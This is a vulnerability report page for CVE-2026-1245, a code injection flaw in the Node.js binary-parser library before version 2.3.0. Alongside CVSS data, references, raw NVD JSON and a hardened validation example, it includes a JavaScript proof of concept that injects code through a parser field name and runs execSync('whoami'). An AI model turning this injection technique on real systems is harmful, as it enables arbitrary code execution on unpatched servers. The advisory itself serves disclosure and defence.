Security Vulnerability Report
CVE-2026-1245 CVSS 6.5 MEDIUM

Published: 2026-01-20 19:15:51
Last Modified: 2026-02-03 21:41:59

Description

A code injection vulnerability in the binary-parser library prior to version 2.3.0 allows arbitrary JavaScript code execution when untrusted values are used in parser field names or encoding parameters. The library directly interpolates these values into dynamically generated code without sanitization, enabling attackers to execute arbitrary code in the context of the Node.js process.
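The pattern the description refers to, and the check that removes it, as an added illustration that is not binary-parser's own code: a toy generator that builds parser source from field definitions and compiles it with `new Function` (an assumed mechanism chosen to mirror the description), first with the values interpolated raw, then with field names restricted to plain identifiers, encodings to an allowlist, and lengths to integers.

```javascript
// Added illustration (hypothetical, not binary-parser's code): a toy parser code
// generator in the style the CVE description outlines, where field definitions
// are turned into JavaScript source and compiled with new Function.

// Same defect class as the advisory describes: untrusted strings are dropped
// straight into the generated source. Returned as text only, never executed here.
function generateUnsafe(fields) {
  let body = 'let offset = 0; const result = {};\n';
  for (const f of fields) {
    body += `result.${f.name} = buffer.toString('${f.encoding}', offset, offset + ${f.length});\n`;
    body += `offset += ${f.length};\n`;
  }
  return body + 'return result;';
}

// Hardened form: a field name must be a plain identifier, the encoding must come
// from an allowlist and the length must be a non-negative integer. Anything else
// is rejected before any source text is built.
const IDENT = /^[A-Za-z_$][A-Za-z0-9_$]*$/;
const ENCODINGS = new Set(['utf8', 'ascii', 'latin1', 'hex', 'base64']);

function compileSafe(fields) {
  let body = 'let offset = 0; const result = {};\n';
  for (const f of fields) {
    if (typeof f.name !== 'string' || !IDENT.test(f.name)) {
      throw new TypeError(`invalid field name: ${JSON.stringify(f.name)}`);
    }
    if (!ENCODINGS.has(f.encoding)) {
      throw new TypeError(`unsupported encoding: ${JSON.stringify(f.encoding)}`);
    }
    if (!Number.isInteger(f.length) || f.length < 0) {
      throw new TypeError('length must be a non-negative integer');
    }
    // Even validated values are emitted as JSON literals, never as raw text.
    body += `result[${JSON.stringify(f.name)}] = buffer.toString(${JSON.stringify(f.encoding)}, offset, offset + ${f.length});\n`;
    body += `offset += ${f.length};\n`;
  }
  return new Function('buffer', body + 'return result;');
}

// Constructed sample: a two-field layout run over a four-byte buffer.
const sampleParse = compileSafe([
  { name: 'tag', encoding: 'ascii', length: 2 },
  { name: 'body', encoding: 'hex', length: 2 },
]);
const sampleResult = sampleParse(Buffer.from([0x48, 0x69, 0xde, 0xad])); // { tag: 'Hi', body: 'dead' }
```

The validation happens at definition time, so a parser built from attacker-influenced field names or encodings fails closed instead of compiling.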

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:keichi:binary-parser:*:*:*:*:*:node.js:*:* - VULNERABLE
binary-parser < 2.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
const { Parser } = require('binary-parser');

// Malicious field name that injects code
const maliciousParser = new Parser()
  .uint8('length')
  .string('name', {
    length: 'length',
    encoding: 'utf8',
    // Inject code via field name using template literal
    formatter: (val) => `${require('child_process').execSync('whoami')}`
  });

// Another PoC - direct code injection in field name
const exploitParser = new Parser()
  .uint8('a')
  .string('${console.log("CODE INJECTED")}', { length: 1 });

// Simulating parsing untrusted data
try {
  const buffer = Buffer.from([5, 0x41]);
  const result = exploitParser.parse(buffer);
  console.log('Parsed result:', result);
} catch (e) {
  console.log('Error (may still execute injected code):', e.message);
}

// Example of detecting vulnerable version
console.log('binary-parser version check:', require('binary-parser/package.json').version);
```

References

https://github.com/keichi/binary-parser - Product
https://github.com/keichi/binary-parser/pull/283 - Patch
https://kb.cert.org/vuls/id/102648 - Third Party Advisory
https://www.npmjs.com/package/binary-parser - Product
https://www.kb.cert.org/vuls/id/102648 - Third Party Advisory

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-1245", "sourceIdentifier": "[email protected]", "published": "2026-01-20T19:15:50.573", "lastModified": "2026-02-03T21:41:59.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A code injection vulnerability in the binary-parser library prior to version 2.3.0 allows arbitrary JavaScript code execution when untrusted values are used in parser field names or encoding parameters. The library directly interpolates these values into dynamically generated code without sanitization, enabling attackers to execute arbitrary code in the context of the Node.js process."}, {"lang": "es", "value": "Una vulnerabilidad de inyección de código en la librería binary-parser anterior a la versión 2.3.0 permite la ejecución arbitraria de código JavaScript cuando se utilizan valores no confiables en nombres de campos del analizador o parámetros de codificación. La librería interpola directamente estos valores en código generado dinámicamente sin sanitización, permitiendo a los atacantes ejecutar código arbitrario en el contexto del proceso de Node.js."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:keichi:binary-parser:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2.3.0", "matchCriteriaId": "7FCCACB7-F3FF-4E03-91E5-3D0E0D2F69A2"}]}]}], "references": [{"url": "https://github.com/keichi/binary-parser", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/keichi/binary-parser/pull/283", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://kb.cert.org/vuls/id/102648", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.npmjs.com/package/binary-parser", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.kb.cert.org/vuls/id/102648", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"]}]}}
```